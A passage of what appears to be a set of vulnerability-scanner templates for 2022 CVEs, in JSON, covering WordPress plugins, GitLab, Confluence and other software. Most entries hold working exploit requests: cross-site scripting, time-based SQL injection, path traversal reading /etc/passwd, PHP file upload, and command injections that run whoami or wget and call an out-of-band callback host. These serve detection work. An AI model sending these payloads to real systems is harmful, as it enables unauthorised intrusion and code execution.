{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>confirm(document.domain)</script>","updraftplus"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31983","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"regex","regex":["^1331' and sleep\\(5\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET 